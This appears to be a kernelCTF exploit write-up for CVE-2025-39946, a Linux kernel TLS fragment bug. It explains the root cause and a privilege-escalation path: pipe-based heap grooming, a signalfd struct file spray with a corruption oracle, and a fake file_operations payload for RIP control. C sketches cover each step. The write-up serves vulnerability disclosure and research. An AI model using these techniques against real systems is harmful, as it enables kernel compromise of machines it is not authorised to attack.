**File:** `pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/exploit.md`

# CVE-2025-39946

Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`.

As stated in the `vulnerability.md` documentation, the bug behind
`CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds
accesses. For exploitation we will focus on the uninitialized data in the
`struct skb_shared_info.frags[]` array.
TLS manages the first 5 fragments for internal use; however, the bug described
makes fragments beyond those accessible to us.
To exploit this, we first groom the heap so that the next (uninitialized)
fragment holds a value we control. We then try to reuse that fragment's page so
that we can trigger a page write that corrupts kernel data.

> **Reviewer:** Can you explain how this works? `vulnerability.md` says that
> you have an OOB read of uninitialized data. How do we go from that to an
> out-of-bounds write?
>
> **Author:** I added more details about the vuln in `vulnerability.md`. Please
> see if this info is enough. Also note the exploit comments regarding this.

## Page Write Targets

With the primitive outlined above (essentially a one-shot use-after-free page
write primitive), we need to find a useful page to write to.
There are two obvious choices for this:
- Page tables
- Slab backing pages

At the time of working on the exploit, page tables seemed to be too unstable due
to the one-shot nature of the write, which is why we will continue with the slab
backing pages. In hindsight, page tables were probably a good fit too.

Which slab do we target? Ideally the slab would contain objects that allow
trivial code execution or other memory write primitives. Additionally the
objects for the slab should be allocatable without too much noise in other
slabs, because we do not want to accidentally corrupt another slab.
Finally, we need to ensure that the same pages used for the slab can be
allocated for skb fragments.

Considering all of the above, I went for `struct file` objects:
- They can be allocated rather easily by opening files, and we can allocate
  quite a few of them.
- Files are allocated from a dedicated `kmem_cache`, so we are sure to only
  corrupt file objects, which aids stability.
- Files contain an `f_op` vtable, allowing direct RIP control.
- File slabs are backed by order-0 pages, which can be allocated easily from
  userspace using pipes.

One downside of files is that we cannot allocate them without also allocating
inodes and dentries. This is a problem because every file allocation results in
the allocation of a `struct dentry`, which means our page write might
accidentally hit a different slab.

## Heap Grooming

In order to get a fragment at the right position we want to have skbs with 6
fragments, so that the last fragment can be picked up by the file slab.
To get the controlled fragments into an skb, we create pipes and fill exactly 5
pages. Pipe buffers are backed by order 0 pages which matches the file slab
`kmem_cache` order. After that we add another partially filled page which will
be the page used for triggering the overwrite.
We then splice those pages onto an skb for the expected fragment layout.

The final page needs to be partially filled so that there is some space left to
write. We will fill the page exactly to the alignment of the `struct file`
objects in the slab. Thus the next write starts at the next `struct file`
object, and will corrupt all the files in the rest of the slab.
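
A minimal sketch of this fill computation, assuming a hypothetical
`FILP_OBJ_SIZE`; the real object size of the `filp` cache must be recovered
from the target kernel (e.g. via `/proc/slabinfo`):

```c
#include <assert.h>
#include <stddef.h>

/* Assumed object size of the "filp" kmem_cache; read the real value from
 * /proc/slabinfo on the target kernel. */
#define FILP_OBJ_SIZE 512UL

/* Round the number of pre-filled bytes up to a struct file slot boundary,
 * so that the later page write starts exactly at the next object and
 * corrupts every object from there to the end of the page. */
static size_t fill_for_offset(size_t min_fill)
{
	return (min_fill + FILP_OBJ_SIZE - 1) / FILP_OBJ_SIZE * FILP_OBJ_SIZE;
}
```

The returned fill amount must stay below `PAGE_SIZE`, otherwise no space is
left in the page for the corrupting write.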

For an increased chance of hitting the right pages, we repeat the above for
N (= 16) pipes. We fill all of them and then release the skbs one by one,
immediately picking each up with a new `struct tls_strparser`. Since the last
freed object will be the first on the freelist, it is very likely that the TLS
socket picks up the prepared skb.
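
The pipe preparation step can be sketched as follows; `prepare_pipe` is a
hypothetical helper, and the later `splice()` of these buffers onto the TLS
socket is omitted:

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

#define PAGE_SZ      4096
#define N_FULL_PAGES 5

/* Fill a fresh pipe with 5 full pages plus one partially filled page.
 * splice()-ing these buffers onto the TLS socket later produces an skb
 * whose sixth fragment is our prepared page. partial_fill is the
 * object-aligned fill amount described above. */
static int prepare_pipe(int pfd[2], size_t partial_fill)
{
	static char page[PAGE_SZ];
	int i;

	if (pipe(pfd) < 0)
		return -1;
	memset(page, 'A', sizeof(page));
	/* Each full-page write fills exactly one order-0 pipe buffer. */
	for (i = 0; i < N_FULL_PAGES; i++)
		if (write(pfd[1], page, PAGE_SZ) != PAGE_SZ)
			return -1;
	/* The partially filled page is the one the overwrite lands in. */
	if (write(pfd[1], page, partial_fill) != (ssize_t)partial_fill)
		return -1;
	return 0;
}
```

The default pipe capacity (64 KiB) is large enough that none of these writes
block.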

## File Slab Spray

Now that each TLS socket is readily equipped with a prepared skb, we want to
spray file slabs so that new slabs will pick up pages that were released from
the pipe buffers earlier.
As the files to allocate we choose `signalfd`s. They are a good choice because
they are simple and have a small context, so apart from the `file` and the
`dentry` slab no other slabs are touched. Furthermore, `signalfd`s provide an
easy-to-use oracle ([1]) that lets us check whether we corrupted a file
structure.

```c
static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
	struct signalfd_ctx *ctx;

	/* ... */

	if (ufd == -1) {
		/* ... */
	} else {
		struct fd f = fdget(ufd);
		if (!f.file)
			return -EBADF;
		ctx = f.file->private_data;
		if (f.file->f_op != &signalfd_fops) { // [1]
			fdput(f);
			return -EINVAL;
		}
		/* ... */
	}
	/* ... */
}
```

As mentioned earlier, we cannot prevent the allocation of `dentry` slabs when
allocating `signalfd`s. To prevent kernel panics from corrupted `dentry`s, we
spray the `signalfd`s in a dedicated forked process that is kept alive forever
in case we fail to find a corrupted file. This way we avoid an accidental oops
during cleanup.
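
A sketch of the spray and the oracle check, relying only on the `signalfd`
behavior shown above (`NFDS` is an arbitrary spray count):

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <sys/signalfd.h>

#define NFDS 128 /* arbitrary spray count */

/* Spray struct file objects by creating signalfds. */
static int spray_signalfds(int fds[NFDS])
{
	sigset_t mask;
	int i;

	sigemptyset(&mask);
	sigaddset(&mask, SIGUSR1);
	for (i = 0; i < NFDS; i++)
		if ((fds[i] = signalfd(-1, &mask, 0)) < 0)
			return -1;
	return 0;
}

/* Oracle from do_signalfd4() above: re-issuing signalfd() on an fd whose
 * f_op no longer points at signalfd_fops fails with EINVAL, so EINVAL on a
 * previously valid signalfd means its struct file was overwritten.
 * Returns the index of the first corrupted fd, or -1 if none. */
static int find_corrupted(const int fds[NFDS])
{
	sigset_t mask;
	int i;

	sigemptyset(&mask);
	for (i = 0; i < NFDS; i++)
		if (signalfd(fds[i], &mask, 0) < 0 && errno == EINVAL)
			return i;
	return -1;
}
```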

## Triggering the Bug for the Page Write

Now that we hopefully have a `signalfd` with a file in a slab backed by the page
we placed into one of the skb fragments, we will trigger the bug as described in
the `vulnerability.md` document and write our payload for each skb set up.

For the payload we opt for a minimal fake file: essentially nothing but an
`f_op` table with a populated `flush` method and a reference count of 1. When
we close the file via `close()`, we reach `filp_close()`, which gives us RIP
control.
The reference count does not need to be exactly 1; anything greater than zero
bypasses the checks in `filp_close()`. In fact, a larger reference count is
preferable, as it prevents the file destructor from running. Since our flush
primitive blocks the kernel in an infinite loop, this is not a major concern
either way.
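
A sketch of building this payload; all offsets and sizes below are assumptions
for illustration and must be recovered from the target kernel's `struct file`
layout (e.g. with pahole):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FILE_OBJ_SIZE  0x200 /* assumed filp slab object size */
#define F_OP_OFFSET    0x28  /* assumed offsetof(struct file, f_op) */
#define F_COUNT_OFFSET 0x38  /* assumed offsetof(struct file, f_count) */

/* Build one fake struct file inside the page that overwrites the slab.
 * Only f_op (pointing at a fake file_operations whose ->flush is the RIP
 * gadget) and a positive f_count are needed for filp_close() to call
 * ->flush on close(). */
static void build_fake_file(uint8_t *obj, uint64_t fake_ops_addr)
{
	uint64_t refs = 0x10; /* > 1 also keeps the destructor from running */

	memset(obj, 0, FILE_OBJ_SIZE);
	memcpy(obj + F_OP_OFFSET, &fake_ops_addr, sizeof(fake_ops_addr));
	memcpy(obj + F_COUNT_OFFSET, &refs, sizeof(refs));
}
```

The same fake file is stamped at every object-size boundary in the page, since
the write corrupts all files to the end of the slab page.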

As a RIP gadget we will utilize the "one gadget" technique described in great
detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md).
Also note that this gadget does not need a KASLR bypass.

To create the `struct file_operations` pointer, we rely on the
deterministically known location of the exception stacks in the CPU entry
area, an issue that has been documented several times (e.g. CVE-2023-0597).

After each write completes, we check every `signalfd` using the oracle
described above. If any of them got corrupted, we trigger our payload by
closing the corresponding file descriptor.

## Stability Notes

Special care was taken to make the exploit repeatable if the page reclaim fails.
It should be close to 80% stable.
As a side note, the usage of the "one gadget" actually helps with the page
reclaim because it causes the PCP to drain, thus giving us more reliability in
the page allocation.

---

**File:** `vulnerability.md`

# CVE-2025-39946

- Requirements:
  - Kernel configuration `CONFIG_TLS`
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84c61fe1a75b4255df1e1e7c054c9e6d048da417
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d
- Affected Versions: 6.0-rc1 - 6.17-rc7
- URL: https://www.cve.org/CVERecord?id=CVE-2025-39946

An issue was found in the kernel TLS implementation when processing invalid
TLS records under network pressure. The behavior can be triggered
deterministically by forcing short reads via out-of-band data, as the kernel
test case demonstrates:

```c
TEST_F(tls_err, oob_pressure)
{
	char buf[1<<16];
	int i;

	memrnd(buf, sizeof(buf));

	EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5);
	EXPECT_EQ(send(self->fd2, buf, sizeof(buf), 0), sizeof(buf));
	for (i = 0; i < 64; i++)
		EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5);
}
```

The problem manifests in the `tls_strp_copyin_frag` function. After entering
copy mode due to the initial short read (which is not yet large enough to parse
the TLS message size) and partially receiving the large buffer, we continue to
copy out chunks from that buffer. The problem is that TLS pre-allocated the
`skb_shinfo->frags` for a fixed (small) TLS record only and fails to check
whether the available fragments are already exhausted ([1]); it then copies the
incoming data regardless ([2]).
Finally, parsing of the TLS header in `tls_rx_msg_size` is made to fail by
returning an invalid size. This aborts the copy loop ([3]), but it does not
abort the full message (the lower-layer TCP receive is not interrupted).
A subsequent read, triggered by further incoming OOB messages, forces re-entry
into `tls_strp_copyin_frag`, eventually exhausting the initialized fragments
and causing reads of uninitialized data, or out-of-bounds reads past the
`skb_shared_info` structure.
Since fragments are basically raw pages, this indirectly yields a page write
primitive via uninitialized fragments ([2]) or potentially crafted
out-of-bounds fragments.

```c
static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
				struct sk_buff *in_skb, unsigned int offset,
				size_t in_len)
{
	size_t len, chunk;
	skb_frag_t *frag;
	int sz;

	frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE]; // [1]

	len = in_len;
	/* First make sure we got the header */
	if (!strp->stm.full_len) {
		/* Assume one page is more than enough for headers */
		chunk = min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag));
		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
					   skb_frag_address(frag) +
					   skb_frag_size(frag),
					   chunk)); // [2]

		skb->len += chunk;
		skb->data_len += chunk;
		skb_frag_size_add(frag, chunk);

		sz = tls_rx_msg_size(strp, skb);
		if (sz < 0)
			return sz; // [3]
		/* ... */
```
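
To make the exhaustion concrete, here is a minimal model of the index
computation at [1]; the pre-allocated fragment count is an assumption for
illustration:

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SZ        4096
#define PREALLOC_FRAGS 5 /* assumed number of fragments TLS initialized */

/* Index used at [1]: it grows with the total bytes already copied into the
 * skb, with no bound check against the initialized fragment count. */
static size_t frag_index(size_t skb_len)
{
	return skb_len / PAGE_SZ;
}
```

Once 5 full pages worth of data have been copied in, the next chunk goes
through `frags[5]`, a fragment that was never initialized.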

---

**File:** `Makefile`

SRC := exploit.c

exploit: $(SRC)
	$(CC) -O2 -static -s -Wall -o $@ $^

exploit_debug: $(SRC)
	$(CC) -O2 -static -ggdb -Wall -o $@ $^

rip: rip.c
	# needs clang to compile
	clang -O3 -o $@ $<

# apparently this is needed for the CI
prerequisites:
